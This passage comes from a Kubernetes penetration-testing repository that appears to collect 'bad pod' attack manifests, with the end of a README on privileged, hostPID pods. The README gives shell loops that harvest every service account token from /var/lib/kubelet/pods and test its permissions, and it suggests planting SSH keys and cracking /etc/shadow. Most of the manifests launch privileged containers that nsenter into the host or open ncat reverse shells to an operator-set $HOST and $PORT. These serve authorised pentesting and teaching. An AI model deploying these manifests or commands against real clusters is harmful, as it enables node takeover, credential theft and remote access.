The examples below automate this process for you a bit: 163 | 164 | **Simply list the namespace and location of every token** 165 | ```bash 166 | kubectl exec -it priv-and-hostpid-exec-pod -- bash 167 | tokens=`find /var/lib/kubelet/pods/ -name token -type l`; \ 168 | for token in $tokens; \ 169 | do parent_dir="$(dirname "$token")"; \ 170 | namespace=`cat $parent_dir/namespace`; \ 171 | echo $namespace "|" $token ; \ 172 | done | sort 173 | ``` 174 | 175 | **What does the [`can-they.sh`](../../scripts/can-they.sh) helper script do?** 176 | 177 | * Takes the pod name and namespace as input 178 | * Grabs all of the tokens from `/var/lib/kubelet/pods/*` on the host 179 | * Runs each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 180 | 181 | 182 | **Run `can-they.sh` where you have kubectl installed and NOT from within the priv pod (pass the pod name and namespace with `-p` and `-n`)** 183 | ``` 184 | ./can-they.sh -n [namespace] -p [pod-name] 185 | ./can-they.sh -n [namespace] -p [pod-name] -i "--list -n kube-system" 186 | ./can-they.sh -n [namespace] -p [pod-name] -i "--list -n default" 187 | ./can-they.sh -n [namespace] -p [pod-name] -i "list secrets -n kube-system" 188 | ./can-they.sh -n [namespace] -p [pod-name] -i "create pods -n kube-system" 189 | ./can-they.sh -n [namespace] -p [pod-name] -i "create clusterrolebindings" 190 | ``` 191 | 192 | **Example run on a kubeadm cluster showing that the kubevol token can get secrets in kube-system** 193 | ``` 194 | ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system" 195 | -------------------------------------------------------- 196 | Token Location: /var/lib/kubelet/pods/21b0eb3f-b99e-40ed-bedf-198c77dfc101/volumes/kubernetes.io~secret/kubevol-token-xfjgv/token 197 | Can I get secrets -n kube-system? 198 | yes 199 | 200 | -------------------------------------------------------- 201 | Token Location: /var/lib/kubelet/pods/75c4da2c-29ef-41c2-bc66-5994a690abd0/volumes/kubernetes.io~secret/default-token-qqgjc/token 202 | Can I get secrets -n kube-system? 203 | no 204 | ...omitted for brevity... 205 | ``` 206 | 207 | 208 | **Run kubectl auth can-i --list against ALL tokens found on the node** 209 | 210 | *Run this where you have kubectl installed and NOT from within the priv pod.* 211 | ``` 212 | tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \ 213 | for filename in $tokens; \ 214 | do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \ 215 | echo "Token Location: $filename_clean"; \ 216 | tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \ 217 | echo -n "What can I do? "; \ 218 | kubectl --token=$tokena auth can-i --list; echo; \ 219 | done 220 | ``` 221 | This is what just happened: 222 | * From outside the pod, you execute `kubectl exec` to find all of the token locations on the host 223 | * You then iterate through the list of filenames, and 224 | * Print the token location 225 | * Run `kubectl auth can-i --list` using each token via the `--token` command line argument. 226 | * This gives you a list of the actions each token can perform cluster-wide. 227 | 228 | The next command will do the same thing, but just in the kube-system namespace. 229 | 230 | **Run kubectl auth can-i --list -n kube-system against ALL tokens found on the node** 231 | 232 | *Run this where you have kubectl installed, and NOT from within the priv pod.* 233 | ``` 234 | tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \ 235 | for filename in $tokens; \ 236 | do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \ 237 | echo "Token Location: $filename_clean"; \ 238 | tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \ 239 | echo -n "What can I do? 
"; \ 240 | kubectl --token=$tokena auth can-i --list -n kube-system; echo; \ 241 | done 242 | ``` 243 | 244 | **Can any of the tokens:** 245 | * Create a pod, deployment, etc. in the kube-system namespace? 246 | * Create a role in the kube-system namespace? 247 | * View secrets in the kube-system namespace? 248 | * Create clusterrolebindings? 249 | 250 | You are looking for a way to access to all resources in all namespaces. 251 | 252 | 253 | ## Some other ideas 254 | * Add your public key authorized_keys on the node and ssh to it 255 | * Crack passwords in /etc/shadow, see if you can use them to access control-plane nodes 256 | * Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there. 257 | 258 | ## Attacks that apply to all pods, even without any special permissions 259 | 260 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 261 | 262 | * Access the cloud metadata service 263 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 264 | * Kubernetes exploits 265 | * Hunting for vulnerable application/services in the cluster 266 | 267 | 268 | # Demonstrate impact 269 | 270 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 271 | 272 | 273 | # References and further reading: 274 | * https://twitter.com/mauilion/status/1129468485480751104 275 | * https://github.com/kvaps/kubectl-node-shell 276 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 277 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 278 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 279 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 280 | 281 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/cronjob/priv-and-hostpid-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-and-hostpid-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: priv-and-hostpid-exec-cronjob 17 | image: ubuntu 18 | tty: true 19 | securityContext: 20 | privileged: true 21 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | restartPolicy: OnFailure 24 | 25 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/cronjob/priv-and-hostpid-revshell-cronjob.yaml: 
-------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-and-hostpid-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: priv-and-hostpid-revshell-cronjob 17 | image: raesene/ncat 18 | securityContext: 19 | privileged: true 20 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | 24 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deamonset/priv-and-hostpid-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-and-hostpid-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-daemonset 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deamonset/priv-and-hostpid-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-and-hostpid-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-daemonset 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-and-hostpid-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: 
priv-and-hostpid-exec-deployment 23 | image: ubuntu 24 | tty: true 25 | securityContext: 26 | privileged: true 27 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deployment/priv-and-hostpid-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-and-hostpid-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: priv-and-hostpid-revshell-deployment 23 | image: raesene/ncat 24 | securityContext: 25 | privileged: true 26 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/job/priv-and-hostpid-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-and-hostpid-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: priv-and-hostpid-exec-job 14 | image: ubuntu 15 | tty: true 16 | securityContext: 17 | privileged: true 18 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | 22 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/job/priv-and-hostpid-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-and-hostpid-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: priv-and-hostpid-revshell-job 14 | image: raesene/ncat 15 | securityContext: 16 | privileged: true 17 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 18 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | 21 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-and-hostpid-exec-pod 5 | labels: 6 | app: pentest 
7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: priv-and-hostpid-pod 11 | image: ubuntu 12 | tty: true 13 | securityContext: 14 | privileged: true 15 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-and-hostpid-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: priv-and-hostpid-pod 11 | image: raesene/ncat 12 | securityContext: 13 | privileged: true 14 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 16 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicaset/priv-and-hostpid-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-and-hostpid-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-replicaset 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicaset/priv-and-hostpid-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-and-hostpid-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-replicaset 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicationcontroller/priv-and-hostpid-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 
1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-and-hostpid-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-replicationcontroller 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicationcontroller/priv-and-hostpid-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-and-hostpid-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-replicationcontroller 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/statefulset/priv-and-hostpid-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-and-hostpid-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-and-hostpid-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-and-hostpid-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: priv-and-hostpid-exec-statefulset 38 | image: ubuntu 39 | tty: true 40 | securityContext: 41 | privileged: true 42 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/statefulset/priv-and-hostpid-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | 
apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-and-hostpid-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-and-hostpid-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-and-hostpid-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: priv-and-hostpid-revshell-statefulset 38 | image: raesene/ncat 39 | securityContext: 40 | privileged: true 41 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /manifests/priv/cronjob/priv-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: priv-exec-cronjob 16 | image: ubuntu 17 | securityContext: 18 | privileged: true 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "while true; do sleep 30; done;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | -------------------------------------------------------------------------------- /manifests/priv/cronjob/priv-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: priv-revshell-cronjob 16 | image: raesene/ncat 17 | securityContext: 18 | privileged: true 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | -------------------------------------------------------------------------------- /manifests/priv/deamonset/priv-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: priv-exec-daemonset 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", 
"--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/deamonset/priv-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: priv-revshell-daemonset 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/deployment/priv-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: priv-exec-deployment 22 | image: ubuntu 23 | securityContext: 24 | privileged: true 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | -------------------------------------------------------------------------------- /manifests/priv/deployment/priv-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: priv-revshell-deployment 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | -------------------------------------------------------------------------------- /manifests/priv/job/priv-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: priv-exec-job 13 | image: ubuntu 14 | securityContext: 15 | privileged: true 16 | command: [ "/bin/sh", "-c", "--" ] 17 | args: [ "while true; do sleep 30; done;" ] 18 | #nodeName: 
k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | -------------------------------------------------------------------------------- /manifests/priv/job/priv-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: priv-revshell-job 13 | image: raesene/ncat 14 | securityContext: 15 | privileged: true 16 | command: [ "/bin/sh", "-c", "--" ] 17 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 18 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | -------------------------------------------------------------------------------- /manifests/priv/pod/priv-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: priv-pod 10 | image: ubuntu 11 | securityContext: 12 | privileged: true 13 | command: [ "/bin/sh", "-c", "--" ] 14 | args: [ "while true; do sleep 30; done;" ] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv/pod/priv-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: priv-pod 10 | image: raesene/ncat 11 | securityContext: 12 | privileged: true 13 | command: [ "/bin/sh", "-c", "--" ] 14 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 16 | -------------------------------------------------------------------------------- /manifests/priv/replicaset/priv-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: priv-exec-replicaset 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicaset/priv-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 
| replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: priv-revshell-replicaset 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicationcontroller/priv-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: priv-exec-replicationcontroller 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicationcontroller/priv-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 